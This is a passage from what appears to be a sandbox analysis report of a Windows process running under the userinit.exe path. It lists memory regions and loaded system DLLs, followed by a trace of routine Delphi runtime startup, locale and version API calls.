entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 6496
start_va = 0x2710000
end_va = 0x27dcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6497
start_va = 0x27e0000
end_va = 0x28aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 6532
start_va = 0x28b0000
end_va = 0x2980fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 6533
start_va = 0x2710000
end_va = 0x27e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6534
start_va = 0x27f0000
end_va = 0x28c4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6535
start_va = 0x2710000
end_va = 0x27e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6536
start_va = 0x27f0000
end_va = 0x28c8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6537
start_va = 0x2710000
end_va = 0x27eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6546
start_va = 0x27f0000
end_va = 0x28ccfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6547
start_va = 0x2710000
end_va = 0x27eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6548
start_va = 0x27f0000
end_va = 0x28d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6559
start_va = 0x28e0000
end_va = 0x29c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 6560
start_va = 0x2710000
end_va = 0x27f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6562
start_va = 0x2800000
end_va = 0x28e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6563
start_va = 0x2710000
end_va = 0x27f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6564
start_va = 0x2800000
end_va = 0x28eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6568
start_va = 0x2710000
end_va = 0x27fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6569
start_va = 0x2800000
end_va = 0x28eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 6570
start_va = 0x28f0000
end_va = 0x29e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028f0000"
filename = ""
Region:
id = 6575
start_va = 0x2710000
end_va = 0x2802fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6576
start_va = 0x2810000
end_va = 0x2904fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6577
start_va = 0x2710000
end_va = 0x2806fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6580
start_va = 0x2810000
end_va = 0x2908fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6581
start_va = 0x2710000
end_va = 0x280afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6587
start_va = 0x2810000
end_va = 0x290cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6588
start_va = 0x2710000
end_va = 0x280efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6589
start_va = 0x2810000
end_va = 0x2910fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 6594
start_va = 0x2920000
end_va = 0x2a22fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 6598
start_va = 0x2710000
end_va = 0x2814fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6599
start_va = 0x2820000
end_va = 0x2926fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 6600
start_va = 0x2710000
end_va = 0x2818fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6605
start_va = 0x2820000
end_va = 0x292afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 6606
start_va = 0x2710000
end_va = 0x281cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6611
start_va = 0x2820000
end_va = 0x292ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 6615
start_va = 0x2930000
end_va = 0x2a42fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 6616
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 6617
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 6618
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 6619
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 6620
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 6621
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 6622
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 6623
start_va = 0x700000
end_va = 0x700fff
entry_point = 0x700000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 6624
start_va = 0x2a50000
end_va = 0x2b4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a50000"
filename = ""
Region:
id = 6625
start_va = 0x710000
end_va = 0x710fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000710000"
filename = ""
Region:
id = 6626
start_va = 0x6d820000
end_va = 0x6d838fff
entry_point = 0x6d820000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 6627
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 6628
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 6632
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 6633
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 6637
start_va = 0x780000
end_va = 0x7bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000780000"
filename = ""
Region:
id = 6638
start_va = 0x2bf0000
end_va = 0x2ceffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bf0000"
filename = ""
Region:
id = 6639
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 6640
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 6641
start_va = 0x2cf0000
end_va = 0x2fbefff
entry_point = 0x2cf0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 6644
start_va = 0x720000
end_va = 0x721fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000720000"
filename = ""
Region:
id = 6645
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 6646
start_va = 0x740000
end_va = 0x740fff
entry_point = 0x740000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 6647
start_va = 0x750000
end_va = 0x751fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000750000"
filename = ""
Region:
id = 6648
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 6649
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 6650
start_va = 0x740000
end_va = 0x740fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000740000"
filename = ""
Region:
id = 6651
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 6652
start_va = 0x7c0000
end_va = 0x7ebfff
entry_point = 0x7c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 6653
start_va = 0x760000
end_va = 0x767fff
entry_point = 0x760000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 6654
start_va = 0x770000
end_va = 0x77ffff
entry_point = 0x770000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 6655
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 6656
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 6657
start_va = 0x2fc0000
end_va = 0x314ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Region:
id = 6658
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 6659
start_va = 0x2fc0000
end_va = 0x308ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Region:
id = 6660
start_va = 0x3110000
end_va = 0x314ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003110000"
filename = ""
Region:
id = 6661
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 6662
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 6663
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 6664
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 6665
start_va = 0x3150000
end_va = 0x320ffff
entry_point = 0x3150000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 340
os_tid = 0x8e4
[0199.149] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0199.149] GetKeyboardType (nTypeFlag=0) returned 4
[0199.149] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0199.149] GetStartupInfoA (in: lpStartupInfo=0x22f9c4 | out: lpStartupInfo=0x22f9c4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0199.149] GetVersion () returned 0x1db10106
[0199.149] GetVersion () returned 0x1db10106
[0199.149] GetCurrentThreadId () returned 0x8e4
[0199.149] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x22f4c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0199.149] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f39b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0199.149] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22f4b0 | out: phkResult=0x22f4b0*=0x0) returned 0x2
[0199.149] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22f4b0 | out: phkResult=0x22f4b0*=0x0) returned 0x2
[0199.150] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22f4b0 | out: phkResult=0x22f4b0*=0x0) returned 0x2
[0199.150] lstrcpynA (in: lpString1=0x22f39b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0199.150] GetThreadLocale () returned 0x409
[0199.150] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x22f4ab, cchData=5 | out: lpLCData="ENU") returned 4
[0199.150] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0199.150] lstrcpynA (in: lpString1=0x22f3b8, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0199.150] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0199.151] lstrcpynA (in: lpString1=0x22f3b8, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0199.151] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0199.151] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0199.151] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x93640
[0199.151] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x580000
[0199.151] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x94640
[0199.151] VirtualAlloc (lpAddress=0x580000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x580000
[0199.151] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0199.151] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x22f5e4, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x22f5d0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0199.152] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x22f5d0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0199.152] GetVersionExA (in: lpVersionInformation=0x22f968*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22f968*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0199.152] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0199.152] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0199.152] GetThreadLocale () returned 0x409
[0199.152] GetThreadLocale () returned 0x409
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x22f840, cchData=256 | out: lpLCData="Jan") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x22f840, cchData=256 | out: lpLCData="January") returned 8
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x22f840, cchData=256 | out: lpLCData="Feb") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x22f840, cchData=256 | out: lpLCData="February") returned 9
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x22f840, cchData=256 | out: lpLCData="Mar") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x22f840, cchData=256 | out: lpLCData="March") returned 6
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x22f840, cchData=256 | out: lpLCData="Apr") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x22f840, cchData=256 | out: lpLCData="April") returned 6
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x22f840, cchData=256 | out: lpLCData="May") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x22f840, cchData=256 | out: lpLCData="May") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x22f840, cchData=256 | out: lpLCData="Jun") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x22f840, cchData=256 | out: lpLCData="June") returned 5
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x22f840, cchData=256 | out: lpLCData="Jul") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x22f840, cchData=256 | out: lpLCData="July") returned 5
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x22f840, cchData=256 | out: lpLCData="Aug") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x22f840, cchData=256 | out: lpLCData="August") returned 7
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x22f840, cchData=256 | out: lpLCData="Sep") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x22f840, cchData=256 | out: lpLCData="September") returned 10
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x22f840, cchData=256 | out: lpLCData="Oct") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x22f840, cchData=256 | out: lpLCData="October") returned 8
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x22f840, cchData=256 | out: lpLCData="Nov") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x22f840, cchData=256 | out: lpLCData="November") returned 9
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x22f840, cchData=256 | out: lpLCData="Dec") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x22f840, cchData=256 | out: lpLCData="December") returned 9
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x22f840, cchData=256 | out: lpLCData="Sun") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x22f840, cchData=256 | out: lpLCData="Sunday") returned 7
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x22f840, cchData=256 | out: lpLCData="Mon") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x22f840, cchData=256 | out: lpLCData="Monday") returned 7
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x22f840, cchData=256 | out: lpLCData="Tue") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x22f840, cchData=256 | out: lpLCData="Tuesday") returned 8
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x22f840, cchData=256 | out: lpLCData="Wed") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x22f840, cchData=256 | out: lpLCData="Wednesday") returned 10
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x22f840, cchData=256 | out: lpLCData="Thu") returned 4
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x22f840, cchData=256 | out: lpLCData="Thursday") returned 9
[0199.153] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x22f840, cchData=256 | out: lpLCData="Fri") returned 4
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x22f840, cchData=256 | out: lpLCData="Friday") returned 7
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x22f840, cchData=256 | out: lpLCData="Sat") returned 4
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x22f840, cchData=256 | out: lpLCData="Saturday") returned 9
[0199.154] GetThreadLocale () returned 0x409
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x22f89c, cchData=256 | out: lpLCData="$") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x22f89c, cchData=256 | out: lpLCData="0") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x22f89c, cchData=256 | out: lpLCData="0") returned 2
